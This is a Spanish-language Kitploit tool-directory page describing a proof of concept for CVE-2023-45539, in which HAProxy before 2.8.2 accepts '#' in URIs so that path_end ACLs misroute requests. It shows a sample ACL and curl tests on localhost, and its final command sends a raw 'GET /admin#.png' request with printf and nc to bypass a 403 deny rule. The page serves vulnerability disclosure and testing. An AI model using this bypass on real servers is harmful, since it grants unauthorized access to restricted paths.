Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
HAProxy-CVE-2023-45539-PoC — HAProxy-CVE-2023-45539-PoC | Kitploit
Herramientas/GitHubGitHub/slicingmelon/haproxy-cve-2023-45539-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónMala Configuración
GitHubslicingmelon/haproxy-cve-2023-45539-poc

HAProxy-CVE-2023-45539-PoC

HAProxy-CVE-2023-45539-PoC

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

HAProxy-CVE-2023-45539-PoC

HAProxy anterior a 2.8.2 acepta # como parte del componente URI, lo que podría permitir a atacantes remotos obtener información sensible o tener otro impacto no especificado debido a la mala interpretación de una regla path_end, como enrutar index.html#.png a un servidor estático.

Lo que se enruta incorrectamente en este CVE no es ninguna extensión que la aplicación backend "soporte" — solo aquellas que el propio HAProxy está configurado para enrutar usando ACLs path_end (o regex).

root@kitploit:~
acl is_static path_end .png .jpg .gif .css .js
use_backend be_static if is_static

Eso significa:

  • A HAProxy no le importa si el backend puede realmente servir .png, .js, etc.
  • Solo verifica la coincidencia de sufijo en la ruta de la solicitud.
  • Si el sufijo coincide con una de esas cadenas, enruta a be_static.

Entonces:

  • /admin#.png → coincide con .png → va a be_static → bypass
  • /admin#.asc → no coincide → permanece en be_app → encuentra denegación → 403
root@kitploit:~
curl -i http://localhost:6655/public                                               
HTTP/1.1 200 OK
content-length: 7
content-type: text/plain

APP OK
root@kitploit:~
curl -i http://localhost:6655/admin 
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

Evasión

root@kitploit:~
printf 'GET /admin#.png HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc -q1 127.0.0.1 6655
HTTP/1.1 200 OK
content-length: 31
content-type: text/plain

STATIC OK (routed by path_end)
Descargar herramienta